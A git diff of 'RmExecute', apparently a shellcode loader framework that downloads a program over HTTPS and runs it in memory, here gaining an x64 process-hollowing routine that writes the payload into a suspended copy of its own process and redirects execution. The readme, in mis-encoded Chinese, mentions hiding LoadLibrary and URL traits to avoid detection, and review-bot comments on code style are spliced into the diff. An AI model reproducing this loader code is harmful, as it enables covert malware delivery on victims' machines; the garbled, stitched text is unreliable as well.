diff --git a/RmExecute/123.bin b/RmExecute/123.bin
new file mode 100644
index 0000000..b64eced
Binary files /dev/null and b/RmExecute/123.bin differ
diff --git a/RmExecute/Loader.cpp b/RmExecute/Loader.cpp
index 6820815..5b2b99d 100644
--- a/RmExecute/Loader.cpp
+++ b/RmExecute/Loader.cpp
@@ -117,6 +117,7 @@ int _tmain(int argc, _TCHAR* argv[])
 int _tmain(int argc, _TCHAR* argv[])
 {
+ #endif
diff --git a/RmExecute/RmExecute.vcxproj b/RmExecute/RmExecute.vcxproj
index 07df817..feabde1 100644
--- a/RmExecute/RmExecute.vcxproj
+++ b/RmExecute/RmExecute.vcxproj
@@ -159,6 +159,11 @@ user32.lib;winhttp.lib;msvcrt.lib; + + + _DEBUG + +
diff --git a/RmExecute/ShellCode.cpp b/RmExecute/ShellCode.cpp
index 6742eb2..d1a5f84 100644
--- a/RmExecute/ShellCode.cpp
+++ b/RmExecute/ShellCode.cpp
@@ -1,10 +1,15 @@
 #include "ShellCode.h"
 //加载起始函数,跳转到入口函数
+#ifdef _WIN64
+VOID mmLoaderSCStart(){
+ Strat();
+#else
 VOID _declspec(naked) mmLoaderSCStart()
 {
-
+ __asm jmp Strat;
+#endif
 }
@@ -49,7 +54,7 @@ public:
 //提取项目的main文件,StartSCode相当于项目的main函数
- void __stdcall StartSCode(char * URL)
+ void __stdcall StartSCode()
 {
@@ -62,7 +67,7 @@ public:
 int size = HttpDownload(host, path, 443, TRUE);
- fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
+ //fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
 RunPortableExecutable();
@@ -75,15 +80,21 @@ public:
 };
 //sehllcode入口函数
-void __stdcall Strat(char * URL)
+void __stdcall Strat()
 {
 //由于需要模拟全局变量,所以使用类包裹下
 RmExecute runclass;
- runclass.StartSCode(URL);
+ runclass.StartSCode();
 }
-
+#ifdef _WIN64
+void mmLoaderSCEnd()
+{
+
+#else
 void __declspec(naked) mmLoaderSCEnd()
 {
+ __asm int 3;
+#endif
 }
\ No newline at end of file
diff --git a/RmExecute/ShellCode.h b/RmExecute/ShellCode.h
index 88e841e..a0e4121 100644
--- a/RmExecute/ShellCode.h
+++ b/RmExecute/ShellCode.h
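Review bot: In the `#ifdef _WIN64` rewrite of mmLoaderSCStart in the first ShellCode.cpp hunk (and of mmLoaderSCEnd in the last hunk of that file) each preprocessor branch opens its own function header, but the closing `}` sits after the `#endif` and is shared by both variants, so the x64 `{` is matched by a brace that textually belongs to the 32-bit definition. It compiles, yet it reads as an unbalanced block and defeats editor brace matching and clang-format. Closing each variant inside its own branch, e.g. `VOID mmLoaderSCStart(){ Strat(); }` before the `#else` and the 32-bit body with its own `}` before the `#endif`, keeps both definitions self-contained.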
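Review bot: The third ShellCode.cpp hunk comments out `fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);` instead of removing it, leaving dead code in StartSCode whose body starts and ends outside the hunk. If it is a debugging aid, guard it with `#ifdef _DEBUG` (the vcxproj hunk in this commit appears to add a `_DEBUG` definition) rather than leaving a commented line; otherwise delete it, since version control keeps the history. The return value of the `RunPortableExecutable();` call on the next line is also discarded, so a failure inside it is never reported to this caller.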
@@ -9,7 +9,7 @@ EXTERN_C VOID mmLoaderSCStart();//这里用来表明shellcode的开始
-void __stdcall Strat(char * URL);//入口函数main
+void __stdcall Strat();//入口函数main
 EXTERN_C VOID mmLoaderSCEnd();//与开头对应的结尾
\ No newline at end of file
diff --git a/RmExecute/Tool.h b/RmExecute/Tool.h
index 440a874..f3696ae 100644
--- a/RmExecute/Tool.h
+++ b/RmExecute/Tool.h
@@ -311,7 +311,73 @@ int RmExecute::HttpDownload(wchar_t* target, wchar_t* path, INTERNET_PORT port,B
 return dwLast;
 }
+#ifdef _WIN64
+bool RmExecute::RunPortableExecutable() {
+ IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
+ IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
+ IMAGE_SECTION_HEADER* SectionHeader;
+ PROCESS_INFORMATION PI;
+ STARTUPINFOA SI;
+
+ CONTEXT* CTX;
+
+ ULONG_PTR* ImageBase; //Base address of the image
+ void* pImageBase; // Pointer to the image base
+
+ int count;
+ char CurrentFilePath[1024];
+
+ DOSHeader = PIMAGE_DOS_HEADER(newbuff); // Initialize Variable
+ NtHeader = PIMAGE_NT_HEADERS(ULONG_PTR(newbuff) + DOSHeader->e_lfanew); // Initialize
+
+ GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable
+
+ if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
+ {
+ ZeroMemory(&PI, sizeof(PI)); // Null the memory
+ ZeroMemory(&SI, sizeof(SI)); // Null the memory
+
+ if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
+ CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current
+ //process in suspended state, for the new image.
+ {
+ // Allocate memory for the context.
+ CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
+ CTX->ContextFlags = CONTEXT_FULL; // Context is allocated
+
+ if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
+ {
+ // Read instructions
+ ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Rbx + 8), LPVOID(&ImageBase), 4, 0);
+
+ pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
+ NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
+
+ // Write the image to the process
+ WriteProcessMemory(PI.hProcess, pImageBase, newbuff, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
+
+ for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
+ {
+ SectionHeader = PIMAGE_SECTION_HEADER(ULONG_PTR(newbuff) + DOSHeader->e_lfanew + 248 + (ULONG_PTR)(count * 40));
+
+ WriteProcessMemory(PI.hProcess, LPVOID(ULONG_PTR(pImageBase) + SectionHeader->VirtualAddress),
+ LPVOID(ULONG_PTR(newbuff) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
+ }
+ WriteProcessMemory(PI.hProcess, LPVOID(CTX->Rbx + 8),
+ LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
+
+ // Move address of entry point to the rax register
+ CTX->Rax = ULONG_PTR(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
+ SetThreadContext(PI.hThread, LPCONTEXT(CTX));
+ ResumeThread(PI.hThread);
+
+ return 0;
+ }
+ }
+ }
+}
+#else
 bool RmExecute::RunPortableExecutable()
 {
@@ -379,3 +445,4 @@ bool RmExecute::RunPortableExecutable()
 }
 return false;
 }
+#endif
\ No newline at end of file
diff --git a/readme.md b/readme.md
index 4d615f6..793bc3a 100644
--- a/readme.md
+++ b/readme.md
@@ -2,7 +2,7 @@ Remote Download and Memory Execute for shellcode framework
-杩滅▼涓嬭浇骞跺唴瀛樺姞杞界殑ShellCode妗嗘灦锛屾殏涓嶆敮鎸乆64
+杩滅▼涓嬭浇骞跺唴瀛樺姞杞界殑ShellCode妗嗘灦锛屽凡缁忔敮鎸亁64
 # 鍙傦紙鎶勶級鑰冿紙琚級椤圭洰
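Review bot: The new `#ifdef _WIN64` body of RmExecute::RunPortableExecutable is declared `bool`, yet its only return statement is `return 0;` on the path that reaches ResumeThread, and every other path (signature mismatch, CreateProcessA failing, GetThreadContext failing) falls off the end of a non-void function, which is undefined behaviour in C++ and leaves the caller unable to tell the outcomes apart. The 32-bit implementation, whose tail is visible in the next hunk, at least ends with `return false;`; the x64 block should do the same before its closing `}` and return `true` where it currently returns `0`. The block is otherwise a near-verbatim duplicate of the 32-bit function with register fields renamed, and this commit removes the readme section that documented that relationship, so a comment at the `#ifdef _WIN64` line along the lines of "x64 variant of the 32-bit body below; differs only in the CONTEXT fields and header offsets" would make future maintenance of the two copies reviewable. The 32-bit function begins inside this hunk but its body runs outside it.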
@@ -63,10 +63,6 @@ pfn->fnMessageBoxA = (pfnMessageBoxA)GetProcAddressWithHash(HASH_MessageBoxA);
 闅愯棌loadlibrary鐗瑰緛鍜寀rl鐗瑰緛锛屾洿涓嶅鏄撹鍙戠幇
-## X64鏀寔
-
-鑷璋冭瘯`Tool.h->RunPortableExecutable`鍑芥暟锛屽ぇ姒傚氨鏄姞涓猉64瀹忔妸EAX浠涔堟崲鎴怰AX(搴旇
-
 ## 鍙嶅皠DLL鍔犺浇鎶鏈
 瀹屽叏涓嶄娇鐢↙oadLibrary锛孭rocessExplorer銆乸rocexp64绛夊伐鍏锋棤娉曟娴嬪埌杩欎釜dll锛屽悓鏃惰绋嬪簭鍙樺緱妯″潡鍖